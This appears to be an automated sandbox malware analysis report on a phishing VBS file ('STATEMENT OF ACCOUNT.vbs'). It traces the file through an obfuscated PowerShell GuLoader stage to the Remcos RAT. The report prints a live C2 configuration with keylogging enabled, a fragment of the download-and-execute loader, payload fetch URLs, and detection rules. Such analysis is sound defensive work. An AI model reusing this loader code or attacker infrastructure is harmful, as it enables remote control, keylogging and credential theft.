{"Host:Port:Password": "103.237.87.159:9462:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LO8JHK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.2236325736.0000000008060000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000004.00000002.2236560886.0000000009F6C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 10 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_5352.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_7372.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xed58:$b2: ::FromBase64String(
                • 0xdde1:$s1: -join
                • 0x1151c:$s3: Reverse
                • 0x758d:$s4: +=
                • 0x764f:$s4: +=
                • 0xb876:$s4: +=
                • 0xd993:$s4: +=
                • 0xdc7d:$s4: +=
                • 0xddc3:$s4: +=
                • 0x17547:$s4: +=
                • 0x175c7:$s4: +=
                • 0x1768d:$s4: +=
                • 0x1770d:$s4: +=
                • 0x178e3:$s4: +=
                • 0x17967:$s4: +=
                • 0xe5ff:$e4: Get-WmiObject
                • 0xe7ee:$e4: Get-Process
                • 0xe846:$e4: Start-Process
                • 0x181d5:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine|base64offset|contains: 8, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", ProcessId: 5660, ProcessName: wscript.exe
                Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7772, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw", ProcessId: 7936, ProcessName: wab.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", CommandLine|base64offset|contains: 8, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs", ProcessId: 5660, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndib

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7772, TargetFilename: C:\ProgramData\remcos\logs.dat

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.159:9462:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LO8JHK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb4 source: powershell.exe, 00000004.00000002.2235317847.0000000007B60000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_227910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_227910F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 103.237.87.159
                Source: global trafficTCP traffic: 192.168.2.4:49739 -> 103.237.87.159:9462
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewIP Address: 103.237.86.247 103.237.86.247
                Source: Joe Sandbox ViewASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
                Source: global trafficHTTP traffic detected: GET /Udmagret.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /NtqoCaH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: global trafficHTTP traffic detected: GET /Udmagret.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /NtqoCaH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login G equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login G equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login*t equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login*t equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2_ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2_ equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login8l equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login8l equals www.yahoo.com (Yahoo)
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.2
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86
